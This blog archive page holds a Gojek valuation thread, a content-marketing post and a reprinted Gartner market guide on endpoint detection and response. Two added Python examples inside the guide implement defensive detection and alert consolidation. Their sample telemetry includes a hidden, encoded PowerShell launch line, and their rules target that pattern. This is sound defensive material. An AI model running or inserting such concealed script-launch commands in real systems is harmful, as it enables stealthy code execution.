
Sunday, December 30, 2018

Adaptive Circular Cities

Social Engineering Tactics

Why is Gojek's valuation 10 times higher than Garuda Indonesia's?

*GO-JEK... Awesome!!!*

Why is Gojek's valuation 10 times higher than Garuda Indonesia's?

Even though Gojek's ONLY asset is an app, while Garuda Indonesia owns dozens of Boeings....

Is this an absurd valuation model, or the magic of the digital economy?

Let's discuss the philosophy behind it in a crisp way. https://www.tagar.id/tag/gojek

THREAD
Valuation means a company's selling price in the eyes of its investors.

The conventional valuation model measures a company's price by its ability to generate profit. Also by its total assets minus its total debt.
Garuda Indonesia's valuation today is only Rp 6 trillion, far below Gojek's valuation, which is already 75 trillion.

Garuda's valuation is poor because they carry Rp 40 trillion of debt, a massive figure. Last year they also lost Rp 2.7 trillion.
Garuda Indonesia's valuation is also poor because their operating costs are high, on top of the enormous burden of paying interest on that debt.

If the debt is 40 trillion, assuming interest of 10%/year, Garuda needs 4 trillion in cash per year just to pay the interest.

Scary.
In the old days, business valuation focused more on tangible assets, or physical assets such as factories, land, buildings, and other physical assets.

Nowadays, intangible assets, or "invisible" assets, are considered more important.

Examples of intangible assets:

Brand image
Patents
Human capital
Apps
Digital platforms
The assets of FB or Google are just apps and digital platforms (plus server farms).

The assets of Toyota or Boeing are hundreds of factories spanning dozens of football fields.

But the valuation of Facebook or Google, which exceeds Rp 8,000 trillion, is dozens of times above the valuation of Toyota or Boeing.
In the digital economy era, the value of an app can be truly massive.

Instagram IS JUST AN APP.

Yes, IG is just an app. Not rocket science technology.

What is IG's valuation today?

Rp 1,000 trillion.
Why can such a simple app be worth thousands of trillions?

The answer: because in this internet era, an app can reach billions of users in the same second.

That is Scalability Power. The Power of the App Economy.

With an internet connection, hundreds of millions of users can be captured instantly.
It is the digital philosophy above that also explains why the valuation of Gojek/Gopay has now exceeded Rp 75 trillion.

Gojek/Gopay is just an app. They have no massive physical assets at all.

Their wealth is only an intangible asset in the form of a modest app called Gojek/Gopay.
The Gojek/Gopay app is valued so highly because, with the internet, the app can reach millions of customers instantly. With almost no cost at all. Why almost zero cost?

Because it captures its customers through a digital connection. Not like a bank, which must have thousands of very expensive branch offices.

With nothing but a digital connection, Gopay has now reached around 30 million customers. Without the help of a single branch office.

And with digital power, those 30 million Gopay users can easily be scaled to 100 million.

Also without the help of a single physical building or thousands of teller staff.

With digital power, the number of Gopay users can be scaled massively, with almost no significant additional cost. Branchless operation.

So investors are optimistic that Gopay users can exceed 100 million within the next 3 years.
Imagine what will happen when Gopay users exceed 100 million?

Simple: the share prices of BCA and Bank Mandiri could be flung into bitter grief.

A banking revolution will happen.

And Gojek's valuation could rise further toward 200 trillion, from the current 75 T. Optimism about the future growth prospects of the business. This is also one of the keys to business valuation.

Gojek/Gopay's valuation is so high because investors believe in their future.

Investors are optimistic that Gopay can reach 100 million customers. So Gojek's valuation, which has now exceeded Rp 75 trillion, comes from these factors:

1. The power of the digital app. Their app can reach tens of millions of customers super efficiently.

2. Investor optimism that Gopay will one day dominate digital payments in the country.

Fanky Christian
Director
PT Daya Cipta Mandiri Solusi
DataCenter-Cloud-Monitoring
Mobile/WA: +628121057533
Wechat/Skype: fankych1211
www.dayaciptamandiri.com

Saturday, December 29, 2018

5 Reasons Why Blogging Is Still the Best Tool for Content Marketing

Regardless of the rise of new content formats and features, your blog remains integral to effective content marketing. It is commonly the interactive hub of your website and offers advantages you cannot achieve through other tools.
Blogging is the most essential part of content marketing when it comes to generating organic traffic.
The following is a look at the primary reasons a blog is critical to lead generation through content marketing.
  • People Want Answers and Advice
Most people with a problem turn to the web looking for information or a solution. Your blog is a critical place to offer information and answers during the initial awareness and consideration stages of a buyer's research.
Your blog is also the best place to offer guidance to people facing the problems your organization addresses.
  • You Can Drive Conversions
If your information is sound and answers the buyer's question, it sets up a call to action for a solution. Blogs with accurate, in-depth information demonstrate credibility and authority on a given topic. Your blog content guides the buyer through the discovery phase of problem solving. Near the end of your post, a well-crafted call to action shows the reader the next step of the journey.
Depending on the circumstances, the CTA could drive downloads of more in-depth white papers or case studies, or link to a landing page where you offer specific solutions.
  • Google Loves Freshness
Fresh content is a key factor in Google's search engine results page (SERP) ranking algorithm. Since your main website pages are typically static, a business blog is the best way to post new content reliably and consistently.
Writing a few new blog articles every week gives Google and other search engines new, relevant content to index when they crawl your site. A diverse range of topics also extends your reach in user searches.
  • Insight into Your Audience
Blogging also helps you build your detective skills in two important ways. First, coming up with topics for a regular blog forces you to think the way your target audience thinks. When writing a good business blog, you are continually asking yourself what the reader needs to know, how best to deliver that knowledge, and how to move the reader to take action.
Second, capturing analytics for your blog reveals much about how your website visitors think and feel. Blog analytics let you work out which topics are most popular among your readers, which content they share on social media, and even what time of day they read your content. The more you know about your leads, the better equipped you are to nurture them and carry them all the way through the sales funnel.
  • Blogs Are Inexpensive
Compared with conventional media advertising, blogs are very inexpensive to operate.
You have already invested in the technology infrastructure, such as servers and software, so only a limited additional investment is needed in that area.
The allocation of staff or contract expenses to content creation is moderate. Additionally, the content can live indefinitely on your site, giving it an extended lifespan.

The Impact of Infographics on Social Media Marketing

Friday, December 28, 2018

Market Guide for Endpoint Detection & Response Solutions

Market Guide for Endpoint Detection and Response Solutions

Published 26 November 2018 - ID G00346131 - 23 min read

Security and risk management leaders need endpoint detection and response tools to enable their security operations teams to discover more evasive threats and efficiently resolve security alerts. The EDR market is rapidly converging with the endpoint protection platform market.

Overview

Key Findings

  • Endpoint detection and response (EDR) is crucial for advanced endpoint protection solutions capable of detecting suspicious behaviors at all levels of the computing stack from the device to the user.
  • While EDR tools can be difficult to use for less experienced operators, they can improve overall security efficiency by reducing the time to detect and respond to security incidents.
  • EDR tools are reaching feature maturity; however, automation and orchestration capability, global contextual incident enrichment, proactive hardening, root cause analysis, and managed service offerings remain differentiators.
  • Established endpoint protection platform (EPP) vendors are rapidly filling in their EDR capabilities while dedicated EDR vendors are adding better prevention capabilities to compete with and displace incumbent EPP vendors. However, vendors that specialize in EDR still have better EDR capabilities.
  • There are over 30 vendors offering credible EDR products; however, the top nine vendors have 83% of the market share. Mergers and acquisitions will continue in 2019.

Recommendations

Security and risk management leaders handling endpoint security should:
  • For mature security organizations: Invest in EDR capabilities that emphasize workflow, orchestration, automation and integration to fully incorporate EDR into existing incident response processes and tools.
  • For less mature security organizations: Invest in EDR solutions, but favor solutions that are fully integrated with endpoint protection, and offer cloud-based management and detection logic. Invest in advanced support for incident response help, or outsource to a managed detection and response solution provider.

Strategic Planning Assumptions

By 2025, 70% of organizations with more than 5,000 seats will have endpoint detection and response (EDR) capabilities, up from 20% today.
By 2022, 60% of organizations that leverage endpoint detection and response (EDR) capabilities will use the endpoint protection solution from the same vendor or managed detection and response services.

Market Definition

This document was revised on 6 December and 28 November 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.
The EDR market is defined as solutions that record and store endpoint-system-level behaviors, use various data analytics techniques to detect suspicious system behavior, provide contextual information, block malicious activity, and provide remediation suggestions to restore affected systems.
EDR solutions must provide the following four primary capabilities:
  • Detect security incidents
  • Contain the incident at the endpoint
  • Investigate security incidents
  • Provide remediation guidance
Essentially, EDR vendors provide tools that enable the bottom half of the adaptive security architecture (see Figure 1).
Figure 1. The Adaptive Security Architecture (figure not reproduced here)
Source: Gartner (November 2018)

Market Description

EDR is a foundational security capability. Gartner expects nearly all endpoint and server protection solutions to include EDR capability eventually. To be effective, EDR solutions require a cloud-scale data management and analytics capability combined with a steady feed of intelligence about changing attacker tradecraft. Endpoint security vendors must develop a core competency in these fields or face disruption.
Good EDR solutions allow incident responders to rapidly answer the most common questions when systems are breached:
  1. What is the extent of the breach?
  2. How did the breach happen?
  3. What did the hacker or malware do while it was active?
  4. How do we restore the system with confidence that all traces are destroyed?
  5. Is this a random attack, or are we a target, and if so what are the attacker’s goals?
  6. How do we prevent it from happening again?

Market Direction

Gartner estimates that the EDR market will surpass $1 billion in 2018, up more than 50% from our 2017 estimate due to rapid growth of installed seats and increased average revenue per unit (ARPU) as a result of EDR vendors selling more prevention. We predict 25% growth in 2019. Meanwhile, we are tracking more than 30 vendors with EDR capability; however, in our estimation, the top nine EDR vendors have more than 83% of the total market share by seat licenses (Carbon Black, Cisco, CrowdStrike, Cybereason, FireEye, McAfee, Microsoft, Symantec and Tanium).
We estimate the market is now roughly 20% penetrated (i.e., 20% of enterprise endpoints have EDR agents). Approximately 40% of EDR deployments are using both EDR and EPP from the same vendor. Longer term, as EDR becomes a standard feature of EPP, breaking out revenue attributable to this market will become more difficult.

Market Analysis

Most security buyers are looking for platform-based solutions that provide all aspects of the adaptive security architecture (see Figure 1). Dedicated EDR solution providers are moving rapidly counterclockwise from the respond and detect quadrants to the prevent quadrant, whereas more traditional endpoint protection platform (EPP) vendors (see “Magic Quadrant for Endpoint Protection Platforms”) are moving clockwise into detect and respond. The stand-alone EDR market will remain viable until at least 2022 for the dedicated security operations center (SOC) team. But the rapid proliferation of EDR capability into EPP solutions will satisfy the midmarket and below (see Note 2). We anticipate that the stand-alone EDR vendors will focus on adopting more features commonly found in the security orchestration, automation and response (SOAR) market (see “Innovation Insight for Security Orchestration, Automation and Response”), shift into other security markets, or be acquired.

Market Trends in 2019

Buyer acceptance of multitenant SaaS EDR solutions is rapidly increasing. Indeed, the benefits of low-friction adoption, cloud storage and computing scale, and low solution maintenance are disruptive to traditional solutions. Architecture is also shifting from smart disconnected client agents to more adaptable lightweight data collection and enforcement agents powered by always-available cloud intelligence. It is mostly the new vendors in this market that are capitalizing on cloud computing to deliver more agile solutions with lower maintenance overhead. Centralized cloud data also provides superior detection analytics enabled by consolidated real-time data collection and the ability to use the data for refining machine learning and other detection techniques, and the luxury of using multiple detection engines simultaneously.
While the EPP solutions have been using a cloud assist signature look-up model, they have not replaced the large dependence on distributed signatures, nor have they taken advantage of cloud detection logic in real time. Several of the newer solutions in the market are now using a cloud-stored signature database and detection engines which have several advantages over distributed signatures. The cloud provides the most up-to-date data on new threats. It can hold larger sets of data, including both the good and bad application signatures; it eliminates the maintenance issues of daily signature distribution; it enables a lighter agent; and it reduces network congestion. Off-network machines may be at more risk in this architecture; however, this is offset by nonsignature client-side detection methods and the design of threats, which mostly depend on the internet to achieve their aims.
Acceptance of cloud data storage and management is increasing, but is not universal. Some vertical markets (e.g., defense) and geographic regions are still wary of cloud delivery. Privacy and regulatory compliance concerns are still common. More critically, most EDR clouds are run from only one or two data centers. Prospective cloud buyers often have valid geopolitical, legal, and availability or latency concerns. Moreover, buyers have a hard time assessing the security of the providers’ cloud environments. Cloud EDR providers will be forced to provide more public and private cloud deployments, and meet industry certifications such as the Federal Risk and Authorization Management Program (FedRAMP) to address these concerns.
EDR solutions are designed to detect and surface suspicious events for inspection. Resolving these less deterministic alerts may increase the workload and require more sophisticated operators than traditional EPP tools require. However, increased visibility from EDR tools also improves existing incident responses and remediation efforts. To help alleviate the skills gap, many EDR solution providers are offering a range of managed support options. Less mature organizations are strongly encouraged to buy support for incident response or fully managed solutions (managed detection and response).
In addition to traditional techniques such as signatures, static file analysis and behavioral analysis, numerous vendors are advertising machine learning (ML) capabilities (or the more hyped “artificial intelligence”) to differentiate their detection methods. There is no question that using ML to detect events in the mountains of data collected is a critical task, and ML will have future uses as EDR solutions expand into user and entity behavior analytics (UEBA)-type detections. However, buyers should beware the hype and focus on measured outcomes. ML is a valuable tool, but it is not the only technique that has value.
Leading improvements in functionality during 2018 included:
  • Addition of deception decoys and breadcrumbs for improved detection
  • Addition of vulnerability assessment
  • Utilization of the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework to classify and consolidate alerts
  • Increased automation of common incident response (IR) tasks and remediation actions
  • Improved search functions for hunting and IR actions
  • Improvements in detection of malicious scripts (particularly PowerShell) and other Microsoft utility exploit techniques
  • Usability improvements aimed at improving SOC operator productivity and lowering the prerequisite knowledge for administrators responding to alerts
  • Improved response actions such as fetching memory and files, and remote access to execute scripts and commands
  • Improvements in linking chained attack stages together into a single event graph
  • Increase in network detection techniques
  • Integration across network products such as cloud access security broker (CASB), firewall, network traffic analysis tools, secure email and web gateways
Many vendors are also advertising improvements in threat-hunting capability. However, in most cases, vendors are referencing improved search capability or automated threat intelligence service integration. Few organizations have the skills for real threat “hunting,” which is defined as searching for unknown threat indicators.

Longer-Term Trends

As the EDR market matures, Gartner expects feature improvements to focus on increasing the capabilities of the adaptive security architecture (see Figure 1) to provide more holistic and integrated security capabilities. These will include community intelligence-sharing portals and global comparative trending data that can improve “predict” capabilities. Proactive security state assessments provide configuration information to spot security problems before they become a breach. Hardening techniques, such as flexible whitelisting, will become more common to prevent malware execution. Hardening policy will provide execution restriction to limit process access to OS services (i.e., no autoexecute from USB, as well as no external network access, proxy or restrictions to OS services) to prevent malware from gaining a foothold.
Data stored from the EDR solutions can also be used to detect potential issues, such as insider threat and account takeover, that are currently addressed by UEBA (see “Market Guide for User and Entity Behavior Analytics”). However, few EDR vendors are addressing this market yet.
EDR vendors have not yet focused on the unique demands of cloud workload protection (see “Market Guide for Cloud Workload Protection Platforms”). Most of the focus of EDR has been on end-user-facing endpoints and on-premises Windows and Linux servers; however, the providers are only beginning to address elastic virtual and container workloads in infrastructure as a service (IaaS) environments.
Attackers are becoming more aware of EDR solutions, and are starting to develop countermeasures such as disabling EDR agents. User space agents are most at risk of compromise by attackers. Memory and kernel space attacks are increasingly common, and we anticipate that attackers will move lower in the stack into hardware and firmware, which may be less visible with current EDR techniques.
Microsoft Windows 10 Defender Advanced Threat Protection (ATP) could be influential in this market. Windows 10 deployments are proceeding rapidly at many organizations. The embedded ATP capability eliminates the need to deploy and manage additional agents. Integration in the OS can provide better visibility control and tamper protection. Microsoft ATP agents are available for Windows 7, 8.1 and 10 as well as Server 2012 R2, 2016 and 2019. Microsoft has now partnered with other EDR providers (e.g., Bitdefender, SentinelOne and Ziften) for older Windows platforms, Linux and Mac support. However, ATP does require additional licensing cost (e.g., E5 licenses).

Critical Capabilities for Consideration in Buying Decisions

Infrastructure

Most solutions consist of an endpoint agent data collector and enforcement engine, with a centralized management server, data repository and analytics engine. All are supported by a cloud-based source of indicators of compromise (IOCs) and information on attack patterns. Many include the capability to ingest third-party threat feeds. Some solutions also offer network agents to detect suspicious network traffic patterns.
All solutions support Windows-based endpoints and Windows servers. Support for Mac OS and Linux is now common, but not all functions are the same across all platforms. For example, solutions may provide detection, but not prevention. Support for mobile OSs, mostly Android, is also expanding.

Architectural Considerations

At their core, EDR solutions are based on the efficient collection, storage and mining of vast amounts of data. Therefore, the most significant architectural consideration is where the data is stored — distributed or centrally — and, when stored centrally, whether it’s kept on-premises or in a cloud-based service.
Distributed storage of endpoint logs on the endpoints themselves makes it easier to scale. However, in a global organization, a large number of endpoints will typically be powered down and nonresponsive to queries at any given time. Moreover, local storage of intrusion evidence is more susceptible to attacker manipulation and deletion. Centralizing the storage of endpoint log data is more responsive, and it enables more aggressive and continuous data mining, but it also requires a bigger centralized data repository, which increases cost. Default data retention periods can range from seven to 90 days. Some providers offer methods to store data longer in “cold” storage that needs to be explicitly loaded to search. Some solutions store only “suspect” or interesting data, while others store all data.
Centralizing the data store in a vendor-managed cloud instance service provides ease of implementation, eliminates scalability issues and enables the EDR provider to provide cross-enterprise correlation of events. However, cloud-based storage of EDR data introduces data privacy issues and potential regulatory and geopolitical issues. Solutions are alleviating this concern by providing visibility into the data uploaded to the cloud and data masking for sensitive information.
Some solutions offer temporary agents that can be downloaded for snapshot inspections or introspection queries that run a batch query of Microsoft logs or memory and disk inspection. Periodic state inspection will be useful in digital business partner assessments, incident response and inspecting unmanaged clients for high-trust transactions or data access scenarios. Although useful for unmanaged machines, temporary agents are unable to record what happens between snapshots and, thus, may miss critical short-duration events. Temp agents may also require the use of common credentials with elevated privileges to execute, which can be exploited later on for lateral movement.

Detection

One of the most critical EDR capabilities is the ability to detect sophisticated hidden threats, ideally without requiring externally fed IOCs. The biggest problem for any buyer of EDR solutions is determining the depth and accuracy of detection techniques. There are not yet any standardized public tests of detection capability. Vendors have excellent marketing departments capable of describing even the simplest techniques as if they were invincible ones; however, most organizations will benefit from improvements in detection beyond traditional EPP.
The MITRE organization has created the ATT&CK knowledge base of adversary tactics and techniques, which can be used to score a vendor’s detection capability across different stages of the attack chain. In the fall of 2018, MITRE conducted ATT&CK-based evaluations of select products. NSS Labs conducts annual tests, and AV-Comparatives is also a good starting point (see “Understand the Relative Importance of AV Testing in EPP Product Selection”).
Future attacks will continue to exploit higher in the stack, including the human layer, and lower in the stack, including firmware-level attacks and attacks on foundational protocols — for example, the Key Reinstallation Attack (KRACK) on the Wi-Fi encryption handshake. PowerShell and Windows utilities exploits are becoming routine. Full in-memory exploits that do not require file-based persistence methods are increasingly common. We also anticipate more attacks against common privileged applications, such as system management tools, and supply chain attacks such as the NotPetya attack (which started from the update of M.E.Doc software) and the CCleaner trojan. Detection methods will also have to address attacks that exploit previously stolen credentials.
The best defensive technique is to deploy a funnel approach to detection that moves from low-cost, but highly deterministic, techniques toward less deterministic techniques aimed at spotting unknown attacks. Solutions should deploy multiple detection approaches (see Note 3); however, the more advanced solutions will focus on behavioral detection at all levels of the stack aimed at spotting common tools, tactics and techniques of advanced adversaries. EDR vendors that also provide incident response services often provide early detection methods of new advanced attacks discovered by their incident response investigations.
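The funnel just described, as an added example that is not Gartner's or any vendor's code: constructed process events pass through a cheap hash-match stage, then ATT&CK-mapped behavioural rules, then a low-confidence prevalence score, and each event stops at the first stage that fires. All hosts, hashes and command lines are constructed; the ATT&CK ID T1059.001 (PowerShell) is real.

```python
"""Tiered detection funnel over constructed endpoint telemetry (added example).

Stage 1 is deterministic and cheap (known-bad hash), stage 2 applies behavioural
rules mapped to ATT&CK, stage 3 is a less deterministic rarity score. An event
leaves the funnel at the first stage that fires, so the expensive, noisier stages
only see what the cheap ones could not resolve.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    pid: int
    image: str          # full path of the executed image
    parent_image: str   # full path of the parent process image
    cmdline: str
    sha256: str


@dataclass(frozen=True)
class Alert:
    host: str
    pid: int
    stage: int          # funnel stage that fired (1 = most deterministic)
    confidence: str     # "high", "medium" or "low"
    technique: str      # ATT&CK technique ID, or "" when not classified
    reason: str


# Constructed placeholder value, not a real indicator of compromise.
KNOWN_BAD_HASHES: Set[str] = {"deadbeef" * 8}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
Prevalence = Dict[str, Set[str]]        # sha256 -> hosts it was seen on


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def stage1_ioc(ev: ProcessEvent, _: Prevalence) -> Optional[Alert]:
    """Stage 1: exact hash match against a known-bad set. Cheap and certain."""
    if ev.sha256 in KNOWN_BAD_HASHES:
        return Alert(ev.host, ev.pid, 1, "high", "", "image hash matches known-bad IOC")
    return None


def stage2_rules(ev: ProcessEvent, _: Prevalence) -> Optional[Alert]:
    """Stage 2: behavioural rules on process lineage and command line."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()
    encoded = "-encodedcommand" in cl or " -enc " in cl
    if img == "powershell.exe" and encoded:
        if parent in OFFICE_APPS:   # document-borne script execution: high confidence
            return Alert(ev.host, ev.pid, 2, "high", "T1059.001",
                         "Office application spawned PowerShell with an encoded command")
        return Alert(ev.host, ev.pid, 2, "medium", "T1059.001",
                     "PowerShell launched with an encoded command")
    return None


def stage3_prevalence(ev: ProcessEvent, hosts_by_hash: Prevalence) -> Optional[Alert]:
    """Stage 3: rarity. A binary seen on one host only, running from a user-writable
    path, is surfaced for a human with low confidence rather than blocked."""
    rare = len(hosts_by_hash.get(ev.sha256, set())) <= 1
    user_writable = not ev.image.lower().startswith(SYSTEM_DIRS)
    if rare and user_writable:
        return Alert(ev.host, ev.pid, 3, "low", "",
                     "binary unique to this host executing from a user-writable path")
    return None


STAGES: List[Callable[[ProcessEvent, Prevalence], Optional[Alert]]] = [
    stage1_ioc, stage2_rules, stage3_prevalence,
]


def run_funnel(events: List[ProcessEvent]) -> List[Alert]:
    """Push every event through the stages in order; stop at the first that fires."""
    hosts_by_hash: Prevalence = defaultdict(set)
    for ev in events:                       # fleet-wide prevalence, computed once
        hosts_by_hash[ev.sha256].add(ev.host)
    alerts: List[Alert] = []
    for ev in events:
        for stage in STAGES:
            alert = stage(ev, hosts_by_hash)
            if alert is not None:
                alerts.append(alert)
                break
    return alerts


# Constructed sample telemetry; hashes and hosts are placeholders.
EVENTS: List[ProcessEvent] = [
    ProcessEvent("ws01", 100, r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 r"C:\Windows\explorer.exe", "WINWORD.EXE report.docx", "aa" * 32),
    ProcessEvent("ws01", 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                 "powershell.exe -nop -w hidden -EncodedCommand QQBBAEEA", "bb" * 32),
    ProcessEvent("ws02", 200, r"C:\Users\alice\AppData\Local\Temp\updater.exe",
                 r"C:\Windows\explorer.exe", "updater.exe /silent", "deadbeef" * 8),
    ProcessEvent("ws03", 300, r"C:\Users\bob\AppData\Local\Temp\svc.exe",
                 r"C:\Windows\explorer.exe", "svc.exe", "cc" * 32),
] + [
    ProcessEvent(f"ws{10 + i}", 400 + i, r"C:\Windows\System32\notepad.exe",
                 r"C:\Windows\explorer.exe", "notepad.exe notes.txt", "dd" * 32)
    for i in range(5)
]

if __name__ == "__main__":
    for a in run_funnel(EVENTS):
        print(f"{a.host} pid={a.pid} stage={a.stage} {a.confidence:6} {a.technique or '-':10} {a.reason}")
```

The known-bad hash on ws02 never reaches stage 3 even though that binary is also rare, which is the point of ordering the stages from deterministic to heuristic.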

Investigation

A security analyst’s ability to investigate EDR and other security alerts to determine the technical- and business-level impacts is a critical capability. Ideal solutions provide a graphic interface that supplies a visual view of events and shows all parent and child events, so that incidents can be traced to their origin and all effects can be shown. Connecting events in a chained attack may be difficult for some solutions. External intelligence — such as related incidents and IOCs, reputation information, and object verdicts from VirusTotal and threat actor information — is useful in scoping the potential impact of an incident. Community information, such as prevalence of objects and actions taken by others, is also valuable. Ideally, solutions will provide enough information that administrators can quickly identify which behaviors triggered alerts and determine the next steps to resolve alerts.
The key is to find solutions that provide guidance sufficient to enable less experienced operators to quickly resolve incidents, but with enough depth to provide sufficient detail for more experienced operators. Solutions are improving automation to take common actions for alerts based on previous actions and integrating with other security solutions to take common actions for remediation. This includes performing related incident searches, submitting objects to a sandbox or VirusTotal for analysis, isolating machines on the network, blocking processes from execution companywide, and coordinating with authentication and network resources to contain damage.
Leading solutions will provide the following features:
  • Fast, real-time, natural language query tools that can get rapid answers to questions about IOC-type objects against the centralized data store or, optionally, against live systems.
  • Risk-prioritized views based on the confidence and severity of the incident, as well as the business value of the assets affected. (Note: “Tagging” devices based on Active Directory, process, machine and network information is a very useful function for dynamically assigning business value.)
  • Click-down attack chain visualization tools that enable investigators to easily pivot on interesting data elements or drill down for more information. (Note: Linking events of seemingly disparate IOCs is extremely important to consolidate alerts and show full attack impact.)
  • Automatable fetching of suspect files or memory and disk dumps.
  • Automatic integrated analysis of suspect processes/files in a cloud or on-premises sandbox, with clearly visible metadata, combined with global information (i.e., categorization, author, prevalence and provenance). Not all EDR solutions provide a sandbox, but most have integration with popular third-party solutions.
  • Severity and confidence indicators on threat alerts.
  • Investigation tools that provide an alert management workflow to enable incidents to be assigned, transferred, annotated and easily resolved.
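The parent/child tracing, alert consolidation, ATT&CK linking and risk-prioritized view described in this section, as an added example that is not Gartner's or any vendor's code: each raw alert is walked up a constructed process tree to the origin of its chain, alerts sharing an origin merge into one incident, and incidents are ranked by severity times the asset's business-value tag. Hosts, pids and tag values are constructed; the ATT&CK IDs used are real.

```python
"""Attack-chain consolidation over constructed process telemetry (added example).

Raw alerts are traced up the parent/child tree to the earliest non-system
process (the chain's origin); alerts with the same origin become one incident
carrying the union of their ATT&CK techniques, ranked by severity x asset value.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Proc:
    host: str
    pid: int
    ppid: int
    image: str


@dataclass(frozen=True)
class RawAlert:
    host: str
    pid: int
    technique: str   # ATT&CK technique ID
    severity: int    # 1 = low, 2 = medium, 3 = high


@dataclass
class Incident:
    host: str
    origin: Proc
    asset_value: int = 1                        # business value from the asset tag (1..3)
    alerts: List[RawAlert] = field(default_factory=list)
    techniques: Set[str] = field(default_factory=set)

    @property
    def severity(self) -> int:
        return max(a.severity for a in self.alerts)

    @property
    def priority(self) -> int:                  # risk-prioritized view
        return self.severity * self.asset_value


# Shells and service hosts that parent nearly every process; the origin of a chain
# is the highest ancestor below them, i.e. the earliest user- or attacker-driven process.
SYSTEM_ROOTS = {"explorer.exe", "services.exe", "wininit.exe", "svchost.exe"}
ProcTree = Dict[Tuple[str, int], Proc]


def build_tree(procs: List[Proc]) -> ProcTree:
    return {(p.host, p.pid): p for p in procs}


def ancestry(tree: ProcTree, host: str, pid: int) -> List[Proc]:
    """Chain from the given process up to its highest recorded ancestor. Stops when
    the parent was never recorded (exited before telemetry) or on a pid-reuse loop."""
    chain: List[Proc] = []
    seen: Set[int] = set()
    cur = tree.get((host, pid))
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = tree.get((host, cur.ppid))
    return chain


def origin_of(tree: ProcTree, host: str, pid: int) -> Optional[Proc]:
    """Earliest non-system process in the chain; the alerting process if none."""
    chain = ancestry(tree, host, pid)
    if not chain:
        return None
    below_roots = [p for p in chain if p.image.lower().rsplit("\\", 1)[-1] not in SYSTEM_ROOTS]
    return below_roots[-1] if below_roots else chain[0]


def consolidate(tree: ProcTree, raw: List[RawAlert], asset_tags: Dict[str, int]) -> List[Incident]:
    """Merge alerts that trace to the same origin; return incidents highest priority first."""
    incidents: Dict[Tuple[str, int], Incident] = {}
    for a in raw:
        origin = origin_of(tree, a.host, a.pid)
        if origin is None:                      # no telemetry for this pid: stands alone
            origin = Proc(a.host, a.pid, 0, "<unrecorded>")
        inc = incidents.setdefault((origin.host, origin.pid),
                                   Incident(a.host, origin, asset_tags.get(a.host, 1)))
        inc.alerts.append(a)
        inc.techniques.add(a.technique)
    return sorted(incidents.values(), key=lambda i: i.priority, reverse=True)


# Constructed telemetry: a finance workstation tagged high value, and a kiosk.
PROCS = build_tree([
    Proc("fin-ws07", 4, 0, r"C:\Windows\explorer.exe"),
    Proc("fin-ws07", 10, 4, r"C:\Program Files\Microsoft Office\OUTLOOK.EXE"),
    Proc("fin-ws07", 20, 10, r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
    Proc("fin-ws07", 30, 20, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc("fin-ws07", 40, 30, r"C:\Windows\System32\cmd.exe"),
    Proc("fin-ws07", 50, 40, r"C:\Windows\System32\rundll32.exe"),
    Proc("kiosk-02", 4, 0, r"C:\Windows\explorer.exe"),
    Proc("kiosk-02", 12, 4, r"C:\Users\kiosk\AppData\Local\Temp\setup.exe"),
])
ASSET_TAGS = {"fin-ws07": 3, "kiosk-02": 1}    # constructed business-value tags
RAW_ALERTS = [
    RawAlert("fin-ws07", 30, "T1059.001", 2),  # PowerShell
    RawAlert("fin-ws07", 50, "T1218.011", 3),  # Rundll32 proxy execution
    RawAlert("kiosk-02", 12, "T1204.002", 1),  # user ran an unknown file
]

if __name__ == "__main__":
    for inc in consolidate(PROCS, RAW_ALERTS, ASSET_TAGS):
        print(inc.host, inc.origin.image, sorted(inc.techniques), "priority", inc.priority)
```

Two alerts on fin-ws07 collapse into one incident whose origin is Outlook, which is the pivot an analyst needs to scope the breach rather than two disconnected process alerts.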

Containment and Remediation

Contextual actions (i.e., actions relevant to the incident) should be available in the administration interface to contain a suspected incident while it is being investigated. The most common option is simply to quarantine a suspected infected endpoint from the rest of the network and isolate its communications to the EDR management console while it is under investigation. Other initial containment options typically include process network isolation, process kill/block, process quarantine and hash-based blocking. Tagging solutions dynamically can provide a way to classify endpoints such that critical systems are not taken offline. Interaction with end users may also be necessary; thus, full directory information with user contact details can be helpful. Leading solutions will provide an instant messaging communications window with the end user.
Although most enterprise organizations reimage machines for all but the most simplistic threats, this approach is expensive and disruptive. Leading EDR solutions should have enough detailed event history information to outline repair actions that will roll back the recorded malicious activity. Leading solutions present operators with a detailed remediation task list and the ability to make changes to the endpoints. Larger organizations are likely to have rigid change control policies and separation of duties between operations and the security teams. As such, EDR tools should be able to transfer the repair tasks list to other operations tools and, ideally, integrate with ticketing systems.
Remediation is the least mature function in the current crop of EDR tools, and most tools focus on simply containing the threat.

Representative Vendors

The vendors listed in this Market Guide are not an exhaustive list. This section is intended to provide more understanding of the market and its offerings.

Market Introduction

Vendors that provide EDR capability come from several IT security markets. Dedicated startup vendors focus specifically on EDR capability for enterprise SOC teams. Some of the Visionary EPP vendors in the Magic Quadrant come from the EDR market, but have added prevention to compete in the EPP market. These vendors continue to be distinguished by functional integration of EDR concepts into the solution, versus the bolted-on approach of the EPP vendors that have been developing their own EDR capabilities. Two client management tool (CMT) vendors have added EDR capability. Network security vendors are adding EDR capability, mainly via acquisition. Finally, some vendors in the broader security market have acquired or built their own EDR capability.
Table 1 lists 32 representative providers in this market and each provider’s product, service or solution name.

Table 1: Representative Vendors in Endpoint Detection and Response Solutions

Vendor
Product, Service or Solution Name
Binary Defense Vision
GravityZone Ultra Suite
Cb Response, Cb Defense
SandBlast Agent
Advanced Malware Protection for Endpoints
Predictive Endpoint Protection Platform
Falcon Endpoint Protection
Endpoint Detection and Response
Deep Detect & Respond
CylanceOPTICS
